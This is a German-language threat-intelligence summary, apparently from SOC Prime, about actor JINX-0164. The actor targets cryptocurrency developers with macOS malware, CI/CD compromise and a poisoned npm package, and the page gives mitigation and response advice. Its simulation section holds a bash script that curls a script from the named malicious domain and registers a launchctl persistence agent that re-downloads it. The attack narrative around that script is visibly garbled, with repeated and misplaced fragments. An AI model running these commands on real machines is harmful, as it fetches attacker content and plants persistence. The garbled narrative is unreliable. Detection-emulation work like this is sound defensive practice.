SOC Prime Bias: Kritisch

29 May 2026 07:25 UTC
newspaper icon wiz.io

Krypto-Software-Entwicklungsinfrastruktur von neuem Bedrohungsakteur ins Visier genommen

Author Photo
SOC Prime Team linkedin icon Folgen
Krypto-Software-Entwicklungsinfrastruktur von neuem Bedrohungsakteur ins Visier genommen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Ein finanziell motivierter Bedrohungsakteur, bekannt als JINX-0164, zielt über Social Engineering auf LinkedIn, macOS-Malware und CI/CD-Kompromittierung auf Kryptowährungsentwickler ab. Die Gruppe setzt einen individuellen Python-RAT namens AUDIOFIX und einen Go-basierten Backdoor namens MINIRAT ein, beide konfiguriert, um mit fest codierten Command-and-Control-Domains zu kommunizieren. Nach dem Erlangen von Zugriff stehlen die Angreifer Cloud- und Entwicklungsanmeldeinformationen, manipulieren Code-Repositories und veröffentlichen sogar bösartige npm-Pakete, um den Zugriff zu erweitern und Kryptowährungsdiebstahl zu ermöglichen. Die Kampagne spiegelt eine ausgeklügelte Lieferkettenbedrohung wider, die auf den Softwareentwicklungslebenszyklus abzielt.

Untersuchung

Wiz CIRT verfolgte den Einbruch vom ersten LinkedIn-Kontakt über die Zustellung eines bösartigen Links, die Ausführung von macOS-Payloads, die Anmeldeinformationen-Diebstahl und die seitliche Bewegung in Quellcode-Repositories. Ihre Untersuchung enthüllte Dropper-Skripte, Persistenz durch launchctl, und den Einsatz des nord-stream Werkzeugs zur Exfiltration von Geheimnissen. Forscher identifizierten auch mehrere gefälschte Domains, VPN-Ausstiegsknoten und einen Lieferkettenkompromiss, der das @velora-dex/sdk npm-Paket umfasst. Dateipfade, Hashes, Domains und IP-Adressen wurden gesammelt, um die Erkennung und Bedrohungsjagd zu unterstützen.

Milderung

Empfohlene Abwehrmaßnahmen umfassen die Überwachung von macOS-Systemen auf launchctl Persistenz, die Erkennung verdächtiger LaunchAgents und das Blockieren der bekannten bösartigen Domains und Command-and-Control-Server. Organisationen sollten signierte Commits durchsetzen, GitHub Vigilant Mode aktivieren und auf nicht verifizierte Commits oder ungewöhnliche Änderungen im CI/CD-Workflow achten. Die VPN-Nutzung sollte auf zugelassene Anbieter beschränkt werden, und MFA sollte für Cloud-Konten und Entwicklungsplattformen erforderlich sein.

Reaktion

Wenn diese Aktivität erkannt wird, isolieren Sie das betroffene macOS-System sofort, sammeln Sie forensische Artefakte und widerrufen Sie alle kompromittierten Anmeldeinformationen und API-Token. Sicherheitsteams sollten eine vollständige Überprüfung von Code-Repositories auf bösartige Commits durchführen und alle kompromittierten npm-Pakete entfernen. Die identifizierten Command-and-Control-Domains sollten blockiert, und Firewall-Regeln sollten aktualisiert werden, um den Datenverkehr zu den bösartigen IP-Adressen zu verweigern. Relevante Interessengruppen sollten benachrichtigt werden, und ein Threat-Intelligence-Austausch mit vertrauenswürdigen Industriepartnern sollte in Betracht gezogen werden.

Angriffsfluss

Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden.

Benachrichtige mich

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorabflugcheck muss bestanden werden.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genau erwartete Telemetrie durch die Erkennungslogik zu erzeugen.

  • Angriffserzählung & Kommandos:

    1. Erste Präsenz: Ein Angreifer liefert eine Phishing-E-Mail mit einem bösartigen Link (T1566.004). Das Opfer klickt auf den Link, der auf https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh.
    2. verweist. Payload-Download: Das Terminal des Opfers führt einen Das Terminal des Opfers führt einen
    3. Befehl aus, der das Skript lautlos abruft. Einrichtung der Persistenz: Das Skript registriert einen Launch-Agent mitDas Skript registriert einen Launch-Agent mit Das Terminal des Opfers führt einen , indem derselbe
    4. Befehl eingebettet wird, sodass das Payload bei jedem Systemstart erneut heruntergeladen wird (T1546.006). Ausführung:

  • Der Launch-Agent läuft mit Systemrechten und führt das heruntergeladene Skript aus, um den Host zu kompromittieren. Regressionstest-Skript:

    (auf einer Test-MacOS-Maschine ausführen; erfordert Admin-Rechte)

  • #!/bin/bash set -euo pipefail # 1. Simulieren Sie den bösartigen Curl-Download (kein tatsächlicher bösartiger Code) MALICIOUS_URL=“https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh“ curl -fsSL „$MALICIOUS_URL“ -o /tmp/audio-fix.sh # 2. Registrieren Sie einen Launch-Agenten, der das Skript beim Start erneut herunterlädt launchctl submit -l com.malicious.audiofix -p /usr/bin/curl -a -c -t „30“ /usr/bin/curl -fsSL „$MALICIOUS_URL“ -o /tmp/audio-fix.sh echo „Bösartiger Launch-Agent registriert. Überprüfen Sie SIEM auf Erkennung.“

    Aufräumkommandos:

# Entfernen Sie den Launch-Agent launchctl remove com.malicious.audiofix || true # Löschen Sie das heruntergeladene Skript rm -f /tmp/audio-fix.sh echo „Bereinigung abgeschlossen.“

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten